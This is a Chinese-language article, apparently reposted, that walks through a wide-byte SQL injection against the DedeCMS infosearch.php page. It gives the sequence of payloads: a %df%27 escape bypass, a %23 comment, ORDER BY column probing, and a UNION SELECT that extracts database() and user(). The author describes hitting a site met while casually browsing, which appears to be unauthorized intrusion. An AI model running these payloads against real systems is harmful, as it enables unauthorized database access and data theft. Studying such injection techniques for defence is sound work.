IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

网站入侵检测一次简单的宽字节注入流程

发布时间:2016-10-18 05:51文章来源:互联网文章作者: 佚名点击次数:
随便逛时碰到dede.记得这个页面有注入 /plus/infosearch.php?action=1111q= 前人有写了一个exp 我试过前辈的exp,发现exp并不是很完善. 不过既然是解析拿就自己来. 加 正常 判断 GPC、addslashes函数,或者icov等. 单引号被转义了,利用宽字节注入!具体我不说

"随便逛时"碰到dede.记得这个页面有注入

/plus/infosearch.php?action=1111&q=

前人有写了一个exp

我试过前辈的exp,发现exp并不是很完善.

不过既然是解析拿就自己来.

加'

\

正常

判断

GPC、addslashes函数,或者icov等.

单引号被转义了,利用宽字节注入!具体我不说了,百度一大推

根据经验随便加个中文后面再跟个单引号

\

加 -----> %df'

\

判断: 存在宽字节注入

两条sql语句接受参数带入执行了,报了两次错,

看到%号,搜索注入,要注视掉

构造sql_exp---> %%df' #

\

报错,根据get数据库文件的思路,#号可以用%23

---> %%df%27 %23

\

成功,判断字段 order by 50

---> %%df%27 order by 50 %23

\

错误, order by 1

---> %%df%27 order by 1 %23

\

判断 可以 order by ,order by 5

-->%%df%27 order by 5 %23

\

判断:

这个页面第一条sql语句所查询的表的字段 小于5 ,第二条大于5.

一番测试后,发现 第一条 的字段为1 ,第二条的字段为 6,用第二条,显位是3,5

联合查询

----> %%df%27 union select 1,2,database(),4,user(),6 %23

\

网站入侵检测一次简单的宽字节注入流程
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/netsafe/Website/531918.html

标签分类:

上一篇:上一篇:网站安全之花生壳网存在安全漏洞
下一篇: 下一篇:没有了
无觅关联推荐,快速提升流量